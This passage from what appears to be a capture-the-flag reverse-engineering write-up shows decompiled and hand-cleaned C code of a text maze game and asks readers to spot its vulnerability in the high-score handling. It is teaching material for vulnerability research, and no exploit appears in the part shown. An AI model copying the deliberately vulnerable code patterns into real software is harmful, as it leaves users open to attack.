\u00a0\u00a0<\/span>FILE *<\/span>v1<\/span>;<\/span> \/\/ r12@1<\/span><\/div>\n
\u00a0\u00a0<\/span>__int64 <\/span>v2<\/span>;<\/span> \/\/ rbx@2<\/span><\/div>\n
\u00a0\u00a0<\/span>int<\/span> i<\/span>;<\/span> \/\/ er13@2<\/span><\/div>\n
\u00a0\u00a0<\/span>int<\/span> v4<\/span>;<\/span> \/\/ er14@8<\/span><\/div>\n
\u00a0\u00a0<\/span>void<\/span> *<\/span>v6<\/span>;<\/span> \/\/ rsp@13<\/span><\/div>\n
\u00a0\u00a0<\/span>char<\/span> ptr<\/span>;<\/span> \/\/ [sp+0h] [bp-40h]@3<\/span><\/div>\n
\u00a0\u00a0<\/span>char<\/span> v8<\/span>;<\/span> \/\/ [sp+Fh] [bp-31h]@13<\/span><\/div>\n
<\/div>\n
\u00a0\u00a0<\/span>puts<\/span>(<\/span>“You can see the sun!\\nFinally, you are free!”<\/span>)<\/span>;<\/span><\/div>\n
\u00a0\u00a0<\/span>v1<\/span> =<\/span> fopen<\/span>(<\/span>“highscore.txt”<\/span>,<\/span> “r”<\/span>)<\/span>;<\/span><\/div>\n
\u00a0\u00a0<\/span>if<\/span> (<\/span> v1<\/span> )<\/span><\/div>\n
\u00a0\u00a0<\/span>{<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0<\/span>v2<\/span> =<\/span> –<\/span>1LL<\/span>;<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0<\/span>for<\/span> (<\/span> i<\/span> =<\/span> 0<\/span>;<\/span> ;<\/span> ++<\/span>i<\/span> )<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0<\/span>{<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span>v4<\/span> =<\/span> i<\/span> +<\/span> 1<\/span>;<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span>if<\/span> (<\/span> fseek<\/span>(<\/span>v1<\/span>,<\/span> v2<\/span>,<\/span> 2<\/span>)<\/span> )<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span>break<\/span>;<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span>if<\/span> (<\/span> fread<\/span>(<\/span>&<\/span>ptr<\/span>,<\/span> 1uLL<\/span>,<\/span> 1uLL<\/span>,<\/span> v1<\/span>)<\/span> !=<\/span> 1<\/span> )<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span>break<\/span>;<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span>if<\/span> (<\/span> !<\/span>ptr<\/span> )<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span>break<\/span>;<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span>if<\/span> (<\/span> ptr<\/span> ==<\/span> 10<\/span> )<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span>break<\/span>;<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span>—<\/span>v2<\/span>;<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span>if<\/span> (<\/span> ptr<\/span> ==<\/span> 13<\/span> )<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span>break<\/span>;<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0<\/span>}<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0<\/span>if<\/span> (<\/span> !<\/span>fseek<\/span>(<\/span>v1<\/span>,<\/span> –<\/span>i<\/span>,<\/span> 2<\/span>)<\/span> )<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0<\/span>{<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span>v6<\/span> =<\/span> alloca<\/span>(<\/span>v4<\/span> +<\/span> 15LL<\/span>)<\/span>;<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span>memset<\/span>(<\/span>(<\/span>void<\/span> *<\/span>)<\/span>(<\/span>(<\/span>unsigned<\/span> __int64<\/span>)<\/span>&<\/span>v8<\/span> &<\/span> 0xFFFFFFFFFFFFFFF0LL<\/span>)<\/span>,<\/span> 0<\/span>,<\/span> v4<\/span>)<\/span>;<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span>if<\/span> (<\/span> fread<\/span>(<\/span>(<\/span>void<\/span> *<\/span>)<\/span>(<\/span>(<\/span>unsigned<\/span> __int64<\/span>)<\/span>&<\/span>v8<\/span> &<\/span> 0xFFFFFFFFFFFFFFF0LL<\/span>)<\/span>,<\/span> 1uLL<\/span>,<\/span> i<\/span>,<\/span> v1<\/span>)<\/span> )<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span>{<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span>__printf_chk<\/span>(<\/span>1LL<\/span>,<\/span> “On the wall behind you, you see a long list of names, the last one is: %s\\n”<\/span>)<\/span>;<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span>fclose<\/span>(<\/span>v1<\/span>)<\/span>;<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span>return<\/span> sub_400CE0<\/span>(<\/span>a1<\/span>)<\/span>;<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span>}<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0<\/span>}<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0<\/span>fclose<\/span>(<\/span>v1<\/span>)<\/span>;<\/span><\/div>\n
\u00a0\u00a0<\/span>}<\/span><\/div>\n
\u00a0\u00a0<\/span>puts<\/span>(<\/span>“On the wall behind you, you see a list of something, probably names.”<\/span>)<\/span>;<\/span><\/div>\n
\u00a0\u00a0<\/span>return<\/span> sub_400CE0<\/span>(<\/span>a1<\/span>)<\/span>;<\/span><\/div>\n
}<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n<\/div>\n

As you can see, this is a really small and simple program, and the Hex-Rays output is pretty readable as-is. When working with the code in IDA, I can clean things up further though. Renaming functions and variables, changing types and function definitions, adding comments, and manually fixing mistakes that has been made by IDA:s automatic code analysis, can make the code a lot easier to understand, and make it easier to spot vulnerabilities in the code.<\/p>\n

After working with the code manually in IDA for a while, we end up with the following code. If you have not found the vulnerability yet, look for it once again while reading through the updated code listing:<\/p>\n

\n
<\/div>\n
\n\n\n\n
\n
\n
1<\/div>\n
2<\/div>\n
3<\/div>\n
4<\/div>\n
5<\/div>\n
6<\/div>\n
7<\/div>\n
8<\/div>\n
9<\/div>\n
10<\/div>\n
11<\/div>\n
12<\/div>\n
13<\/div>\n
14<\/div>\n
15<\/div>\n
16<\/div>\n
17<\/div>\n
18<\/div>\n
19<\/div>\n
20<\/div>\n
21<\/div>\n
22<\/div>\n
23<\/div>\n
24<\/div>\n
25<\/div>\n
26<\/div>\n
27<\/div>\n
28<\/div>\n
29<\/div>\n
30<\/div>\n
31<\/div>\n
32<\/div>\n
33<\/div>\n
34<\/div>\n
35<\/div>\n
36<\/div>\n
37<\/div>\n
38<\/div>\n
39<\/div>\n
40<\/div>\n
41<\/div>\n
42<\/div>\n
43<\/div>\n
44<\/div>\n
45<\/div>\n
46<\/div>\n
47<\/div>\n
48<\/div>\n
49<\/div>\n
50<\/div>\n
51<\/div>\n
52<\/div>\n
53<\/div>\n
54<\/div>\n
55<\/div>\n
56<\/div>\n
57<\/div>\n
58<\/div>\n
59<\/div>\n
60<\/div>\n
61<\/div>\n
62<\/div>\n
63<\/div>\n
64<\/div>\n
65<\/div>\n
66<\/div>\n
67<\/div>\n
68<\/div>\n
69<\/div>\n
70<\/div>\n
71<\/div>\n
72<\/div>\n
73<\/div>\n
74<\/div>\n
75<\/div>\n
76<\/div>\n
77<\/div>\n
78<\/div>\n
79<\/div>\n
80<\/div>\n
81<\/div>\n
82<\/div>\n
83<\/div>\n
84<\/div>\n
85<\/div>\n
86<\/div>\n
87<\/div>\n
88<\/div>\n
89<\/div>\n
90<\/div>\n
91<\/div>\n
92<\/div>\n
93<\/div>\n
94<\/div>\n
95<\/div>\n
96<\/div>\n
97<\/div>\n
98<\/div>\n
99<\/div>\n
100<\/div>\n
101<\/div>\n
102<\/div>\n
103<\/div>\n
104<\/div>\n
105<\/div>\n
106<\/div>\n
107<\/div>\n
108<\/div>\n
109<\/div>\n
110<\/div>\n
111<\/div>\n
112<\/div>\n
113<\/div>\n
114<\/div>\n
115<\/div>\n
116<\/div>\n
117<\/div>\n
118<\/div>\n
119<\/div>\n
120<\/div>\n
121<\/div>\n
122<\/div>\n
123<\/div>\n
124<\/div>\n
125<\/div>\n
126<\/div>\n
127<\/div>\n
128<\/div>\n
129<\/div>\n
130<\/div>\n
131<\/div>\n
132<\/div>\n
133<\/div>\n
134<\/div>\n
135<\/div>\n
136<\/div>\n
137<\/div>\n
138<\/div>\n
139<\/div>\n
140<\/div>\n
141<\/div>\n
142<\/div>\n
143<\/div>\n
144<\/div>\n
145<\/div>\n
146<\/div>\n
147<\/div>\n
148<\/div>\n
149<\/div>\n
150<\/div>\n
151<\/div>\n
152<\/div>\n
153<\/div>\n
154<\/div>\n
155<\/div>\n
156<\/div>\n
157<\/div>\n
158<\/div>\n
159<\/div>\n
160<\/div>\n
161<\/div>\n
162<\/div>\n
163<\/div>\n
164<\/div>\n
165<\/div>\n
166<\/div>\n
167<\/div>\n
168<\/div>\n
169<\/div>\n
170<\/div>\n
171<\/div>\n
172<\/div>\n
173<\/div>\n
174<\/div>\n
175<\/div>\n
176<\/div>\n
177<\/div>\n
178<\/div>\n
179<\/div>\n
180<\/div>\n
181<\/div>\n
182<\/div>\n
183<\/div>\n
184<\/div>\n
185<\/div>\n
186<\/div>\n
187<\/div>\n
188<\/div>\n
189<\/div>\n
190<\/div>\n
191<\/div>\n
192<\/div>\n
193<\/div>\n
194<\/div>\n
195<\/div>\n
196<\/div>\n
197<\/div>\n
198<\/div>\n
199<\/div>\n
200<\/div>\n
201<\/div>\n
202<\/div>\n
203<\/div>\n
204<\/div>\n
205<\/div>\n
206<\/div>\n
207<\/div>\n
208<\/div>\n
209<\/div>\n
210<\/div>\n
211<\/div>\n
212<\/div>\n
213<\/div>\n
214<\/div>\n
215<\/div>\n
216<\/div>\n
217<\/div>\n
218<\/div>\n
219<\/div>\n
220<\/div>\n
221<\/div>\n
222<\/div>\n
223<\/div>\n
224<\/div>\n
225<\/div>\n
226<\/div>\n
227<\/div>\n
228<\/div>\n
229<\/div>\n
230<\/div>\n
231<\/div>\n
232<\/div>\n
233<\/div>\n
234<\/div>\n
235<\/div>\n
236<\/div>\n
237<\/div>\n
238<\/div>\n
239<\/div>\n
240<\/div>\n<\/div>\n<\/td>\n
\n
\n
typedef<\/span> struct<\/span><\/div>\n
{<\/span><\/div>\n
\u00a0\u00a0<\/span>unsigned<\/span> char<\/span> x<\/span>;<\/span><\/div>\n
\u00a0\u00a0<\/span>unsigned<\/span> char<\/span> y<\/span>;<\/span><\/div>\n
}<\/span> position<\/span>;<\/span><\/div>\n
<\/div>\n
\/\/————————————————————————-<\/span><\/div>\n
\/\/ Function declarations<\/span><\/div>\n
<\/div>\n
void<\/span> __fastcall <\/span>append_highscore<\/span>(<\/span>unsigned<\/span> int<\/span> num_moves<\/span>)<\/span>;<\/span><\/div>\n
void<\/span> __fastcall <\/span>reached_goal<\/span>(<\/span>unsigned<\/span> int<\/span> num_moves<\/span>)<\/span>;<\/span><\/div>\n
<\/div>\n
\/\/————————————————————————-<\/span><\/div>\n
\/\/ Data declarations<\/span><\/div>\n
<\/div>\n
position <\/span>winning_position<\/span> =<\/span> {<\/span> 178u<\/span>,<\/span> 93u<\/span> }<\/span>;<\/span><\/div>\n
position <\/span>maze_map<\/span>[<\/span>8638<\/span>]<\/span> =<\/span> {<\/span><\/div>\n
\u00a0\u00a0<\/span>.<\/span>.<\/span>.<\/span> \/\/ large array removed to make this more convenient to read<\/span><\/div>\n
}<\/span>;<\/span><\/div>\n
const<\/span> char<\/span> *<\/span>info_text<\/span>[<\/span>16<\/span>]<\/span> =<\/span><\/div>\n
{<\/span><\/div>\n
\u00a0\u00a0<\/span>“You are trapped.”<\/span>,<\/span><\/div>\n
\u00a0\u00a0<\/span>“You are in a dead end, you can only go west.”<\/span>,<\/span><\/div>\n
\u00a0\u00a0<\/span>“You are in a dead end, you can only go north.”<\/span>,<\/span><\/div>\n
\u00a0\u00a0<\/span>“You can feel a wall in the east and south.”<\/span>,<\/span><\/div>\n
\u00a0\u00a0<\/span>“You are in a dead end, you can only go east.”<\/span>,<\/span><\/div>\n
\u00a0\u00a0<\/span>“North and south are blocked.”<\/span>,<\/span><\/div>\n
\u00a0\u00a0<\/span>“You can go north, oh east is also free.”<\/span>,<\/span><\/div>\n
\u00a0\u00a0<\/span>“In the south, something is in your way.”<\/span>,<\/span><\/div>\n
\u00a0\u00a0<\/span>“You are in a dead end, you can only go south.”<\/span>,<\/span><\/div>\n
\u00a0\u00a0<\/span>“From somewhere comes light, you can see a wall in north and east directions.”<\/span>,<\/span><\/div>\n
\u00a0\u00a0<\/span>“In the south is no wall, you can also go north.”<\/span>,<\/span><\/div>\n
\u00a0\u00a0<\/span>“In the east is a wall.”<\/span>,<\/span><\/div>\n
\u00a0\u00a0<\/span>“South and East are not blocked.”<\/span>,<\/span><\/div>\n
\u00a0\u00a0<\/span>“Better not go north.”<\/span>,<\/span><\/div>\n
\u00a0\u00a0<\/span>“West is blocked.”<\/span>,<\/span><\/div>\n
\u00a0\u00a0<\/span>“You can feel no wall around you.”<\/span><\/div>\n
}<\/span>;<\/span><\/div>\n
const<\/span> char<\/span> *<\/span>west_str_ptr<\/span> =<\/span> “west”<\/span>;<\/span><\/div>\n
const<\/span> char<\/span> *<\/span>north_str_ptr<\/span> =<\/span> “north”<\/span>;<\/span><\/div>\n
const<\/span> char<\/span> *<\/span>east_str_ptr<\/span> =<\/span> “east”<\/span>;<\/span><\/div>\n
const<\/span> char<\/span> *<\/span>south_str_ptr<\/span> =<\/span> “south”<\/span>;<\/span><\/div>\n
position <\/span>current_position<\/span>;<\/span><\/div>\n
<\/div>\n
\/\/—– (00000000004008E0) —————————————————-<\/span><\/div>\n
__int64 <\/span>__fastcall <\/span>main<\/span>(<\/span>__int64 <\/span>argc<\/span>,<\/span> char<\/span> *<\/span>*<\/span>argv<\/span>,<\/span> char<\/span> *<\/span>*<\/span>envp<\/span>)<\/span><\/div>\n
{<\/span><\/div>\n
\u00a0\u00a0<\/span>position <\/span>_current_position<\/span>;<\/span> \/\/ di@2<\/span><\/div>\n
\u00a0\u00a0<\/span>position *<\/span>adjacent_position<\/span>;<\/span> \/\/ rsi@2<\/span><\/div>\n
\u00a0\u00a0<\/span>unsigned<\/span> int<\/span> valid_moves<\/span>;<\/span> \/\/ er14@2<\/span><\/div>\n
\u00a0\u00a0<\/span>__int64 <\/span>valid_moves_bitmap<\/span>;<\/span> \/\/ rcx@2<\/span><\/div>\n
\u00a0\u00a0<\/span>position *<\/span>map_iterator<\/span>;<\/span> \/\/ rax@3<\/span><\/div>\n
\u00a0\u00a0<\/span>const<\/span> char<\/span> *<\/span>info_text_ptr<\/span>;<\/span> \/\/ rdx@7<\/span><\/div>\n
\u00a0\u00a0<\/span>int<\/span> can_go_west<\/span>;<\/span> \/\/ er12@7<\/span><\/div>\n
\u00a0\u00a0<\/span>int<\/span> can_go_north<\/span>;<\/span> \/\/ er13@7<\/span><\/div>\n
\u00a0\u00a0<\/span>int<\/span> can_go_east<\/span>;<\/span> \/\/ er15@7<\/span><\/div>\n
\u00a0\u00a0<\/span>int<\/span> can_go_south<\/span>;<\/span> \/\/ er14@7<\/span><\/div>\n
\u00a0\u00a0<\/span>char<\/span> *<\/span>_s<\/span>;<\/span> \/\/ rbx@8<\/span><\/div>\n
\u00a0\u00a0<\/span>char<\/span> *<\/span>user_input<\/span>;<\/span> \/\/ rbx@10<\/span><\/div>\n
\u00a0\u00a0<\/span>signed<\/span> int<\/span> move_currently_checked<\/span>;<\/span> \/\/ eax@21<\/span><\/div>\n
\u00a0\u00a0<\/span>signed<\/span> int<\/span> direction<\/span>;<\/span> \/\/ er12@23<\/span><\/div>\n
\u00a0\u00a0<\/span>unsigned<\/span> int<\/span> num_moves<\/span>;<\/span> \/\/ [sp+Ch] [bp-64h]@1<\/span><\/div>\n
\u00a0\u00a0<\/span>position <\/span>valid_move_map<\/span>[<\/span>8<\/span>]<\/span>;<\/span> \/\/ [sp+10h] [bp-60h]@2<\/span><\/div>\n
\u00a0\u00a0<\/span>char<\/span> *<\/span>s<\/span>;<\/span> \/\/ [sp+20h] [bp-50h]@8<\/span><\/div>\n
\u00a0\u00a0<\/span>size<\/span>_<\/span>t n<\/span>;<\/span> \/\/ [sp+30h] [bp-40h]@19<\/span><\/div>\n
<\/div>\n
\u00a0\u00a0<\/span>setbuf<\/span>(<\/span>stdin<\/span>,<\/span> 0LL<\/span>)<\/span>;<\/span><\/div>\n
\u00a0\u00a0<\/span>setbuf<\/span>(<\/span>stdout<\/span>,<\/span> 0LL<\/span>)<\/span>;<\/span><\/div>\n
\u00a0\u00a0<\/span>current_position<\/span>.<\/span>y<\/span> =<\/span> 1<\/span>;<\/span><\/div>\n
\u00a0\u00a0<\/span>current_position<\/span>.<\/span>x<\/span> =<\/span> 1<\/span>;<\/span><\/div>\n
\u00a0\u00a0<\/span>puts<\/span>(<\/span>“You wake up and have a big headache.”<\/span>)<\/span>;<\/span><\/div>\n
\u00a0\u00a0<\/span>num_moves<\/span> =<\/span> 0<\/span>;<\/span><\/div>\n
main_loop<\/span>:<\/span><\/div>\n
\u00a0\u00a0<\/span>_current_position<\/span> =<\/span> current_position<\/span>;<\/span><\/div>\n
\u00a0\u00a0<\/span>adjacent_position<\/span> =<\/span> valid_move_map<\/span>;<\/span><\/div>\n
\u00a0\u00a0<\/span>valid_moves<\/span> =<\/span> 0<\/span>;<\/span><\/div>\n
\u00a0\u00a0<\/span>LODWORD<\/span>(<\/span>valid_moves_bitmap<\/span>)<\/span> =<\/span> 0<\/span>;<\/span><\/div>\n
check_valid_moves_loop<\/span>:<\/span><\/div>\n
\u00a0\u00a0<\/span>while<\/span> (<\/span> 2<\/span> )<\/span><\/div>\n
\u00a0\u00a0<\/span>{<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0<\/span>*<\/span>adjacent_position<\/span> =<\/span> _current_position<\/span>;<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0<\/span>*<\/span>(<\/span>&<\/span>adjacent_position<\/span>-><\/span>x<\/span> +<\/span> (<\/span>valid_moves_bitmap<\/span> &<\/span> 1<\/span>)<\/span>)<\/span> +=<\/span> (<\/span>valid_moves_bitmap<\/span> &<\/span> 2<\/span>)<\/span> –<\/span> 1<\/span>;<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0<\/span>++<\/span>adjacent_position<\/span>;<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0<\/span>map_iterator<\/span> =<\/span> maze_map<\/span>;<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0<\/span>do<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0<\/span>{<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span>if<\/span> (<\/span> adjacent_position<\/span>[<\/span>–<\/span>1<\/span>]<\/span> ==<\/span> *<\/span>map<\/span>_<\/span>iterator )<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span>{<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span>valid_moves_bitmap<\/span> =<\/span> (<\/span>unsigned<\/span> int<\/span>)<\/span>(<\/span>valid_moves_bitmap<\/span> +<\/span> 1<\/span>)<\/span>;<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span>if<\/span> (<\/span> (<\/span>_DWORD<\/span>)<\/span>valid_moves_bitmap<\/span> !=<\/span> 4<\/span> )<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span>goto<\/span> check_valid_moves_loop<\/span>;<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span>goto<\/span> check_valid_moves_loop_finished<\/span>;<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span>}<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span>++<\/span>map_iterator<\/span>;<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0<\/span>}<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0<\/span>while<\/span> (<\/span> map_iterator<\/span> !=<\/span> &<\/span>maze_map<\/span>[<\/span>sizeof<\/span>(<\/span>maze_map<\/span>)<\/span>\/<\/span>sizeof<\/span>(<\/span>maze_map<\/span>[<\/span>0<\/span>]<\/span>)<\/span>]<\/span> )<\/span>;<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0<\/span>move_currently_checked<\/span> =<\/span> 1<\/span> <<<\/span> valid_moves_bitmap<\/span>;<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0<\/span>valid_moves_bitmap<\/span> =<\/span> (<\/span>unsigned<\/span> int<\/span>)<\/span>(<\/span>valid_moves_bitmap<\/span> +<\/span> 1<\/span>)<\/span>;<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0<\/span>valid_moves<\/span> |=<\/span> move_currently_checked<\/span>;<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0<\/span>if<\/span> (<\/span> (<\/span>_DWORD<\/span>)<\/span>valid_moves_bitmap<\/span> !=<\/span> 4<\/span> )<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span>continue<\/span>;<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0<\/span>break<\/span>;<\/span><\/div>\n
\u00a0\u00a0<\/span>}<\/span><\/div>\n
check_valid_moves_loop_finished<\/span>:<\/span><\/div>\n
\u00a0\u00a0<\/span>info_text_ptr<\/span> =<\/span> info_text<\/span>[<\/span>(<\/span>unsigned<\/span> __int64<\/span>)<\/span>valid_moves<\/span>]<\/span>;<\/span><\/div>\n
\u00a0\u00a0<\/span>can_go_west<\/span> =<\/span> valid_moves<\/span> &<\/span> 1<\/span>;<\/span><\/div>\n
\u00a0\u00a0<\/span>can_go_north<\/span> =<\/span> valid_moves<\/span> &<\/span> 2<\/span>;<\/span><\/div>\n
\u00a0\u00a0<\/span>can_go_east<\/span> =<\/span> valid_moves<\/span> &<\/span> 4<\/span>;<\/span><\/div>\n
\u00a0\u00a0<\/span>can_go_south<\/span> =<\/span> valid_moves<\/span> &<\/span> 8<\/span>;<\/span><\/div>\n
\u00a0\u00a0<\/span>__printf_chk<\/span>(<\/span>1LL<\/span>,<\/span> “%s Where do you want to go (today)? “<\/span>,<\/span> info_text_ptr<\/span>,<\/span> valid_moves_bitmap<\/span>)<\/span>;<\/span><\/div>\n
\u00a0\u00a0<\/span>while<\/span> (<\/span> 1<\/span> )<\/span><\/div>\n
\u00a0\u00a0<\/span>{<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0<\/span>s<\/span> =<\/span> 0LL<\/span>;<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0<\/span>n<\/span> =<\/span> 0LL<\/span>;<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0<\/span>if<\/span> (<\/span> getline<\/span>(<\/span>&<\/span>s<\/span>,<\/span> &<\/span>n<\/span>,<\/span> stdin<\/span>)<\/span> <=<\/span> 0<\/span> )<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span>return<\/span> 0LL<\/span>;<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0<\/span>_s<\/span> =<\/span> s<\/span>;<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0<\/span>if<\/span> (<\/span> !<\/span>s<\/span> ||<\/span> !<\/span>*<\/span>s<\/span> )<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span>return<\/span> 0LL<\/span>;<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0<\/span>_s<\/span>[<\/span>strlen<\/span>(<\/span>s<\/span>)<\/span> –<\/span> 1<\/span>]<\/span> =<\/span> 0<\/span>;<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0<\/span>user_input<\/span> =<\/span> s<\/span>;<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0<\/span>if<\/span> (<\/span> !<\/span>strcasecmp<\/span>(<\/span>west_str_ptr<\/span>,<\/span> s<\/span>)<\/span> &&<\/span> can_go<\/span>_<\/span>west )<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0<\/span>{<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span>direction<\/span> =<\/span> 0<\/span>;<\/span><\/div>\n
make_move<\/span>:<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span>__printf_chk<\/span>(<\/span>1LL<\/span>,<\/span> “You go %s.\\n”<\/span>,<\/span> user_input<\/span>)<\/span>;<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span>free<\/span>(<\/span>s<\/span>)<\/span>;<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span>++<\/span>num_moves<\/span>;<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span>current_position<\/span> =<\/span> valid_move_map<\/span>[<\/span>direction<\/span>]<\/span>;<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span>if<\/span> (<\/span> winning_position<\/span> !=<\/span> current<\/span>_<\/span>position )<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span>goto<\/span> main_loop<\/span>;<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span>reached_goal<\/span>(<\/span>num_moves<\/span>)<\/span>;<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span>return<\/span> 0LL<\/span>;<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0<\/span>}<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0<\/span>if<\/span> (<\/span> !<\/span>strcasecmp<\/span>(<\/span>north_str_ptr<\/span>,<\/span> user_input<\/span>)<\/span> &&<\/span> can_go<\/span>_<\/span>north )<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0<\/span>{<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span>direction<\/span> =<\/span> 1<\/span>;<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span>goto<\/span> make_move<\/span>;<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0<\/span>}<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0<\/span>if<\/span> (<\/span> !<\/span>strcasecmp<\/span>(<\/span>east_str_ptr<\/span>,<\/span> user_input<\/span>)<\/span> &&<\/span> can_go<\/span>_<\/span>east )<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0<\/span>{<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span>direction<\/span> =<\/span> 2<\/span>;<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span>goto<\/span> make_move<\/span>;<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0<\/span>}<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0<\/span>if<\/span> (<\/span> !<\/span>strcasecmp<\/span>(<\/span>south_str_ptr<\/span>,<\/span> user_input<\/span>)<\/span> &&<\/span> can_go<\/span>_<\/span>south )<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0<\/span>{<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span>direction<\/span> =<\/span> 3<\/span>;<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/span>goto<\/span> make_move<\/span>;<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0<\/span>}<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0<\/span>__printf_chk<\/span>(<\/span>1LL<\/span>,<\/span> “You can not go %s. Where do you want to go (today)? “<\/span>,<\/span> user_input<\/span>)<\/span>;<\/span><\/div>\n
\u00a0\u00a0\u00a0\u00a0<\/span>free<\/span>(<\/span>s<\/span>)<\/span>;<\/span><\/div>\n
\u00a0\u00a0<\/span>}<\/span><\/div>\n
}<\/span><\/div>\n
<\/div>\n
\/\/—– (0000000000400CE0) —————————————————-<\/span><\/div>\n
void<\/span> __fastcall <\/span>append_highscore<\/span>(<\/span>unsigned<\/span> int<\/span> num_moves<\/span>)<\/span><\/div>\n
{<\/span><\/div>\n
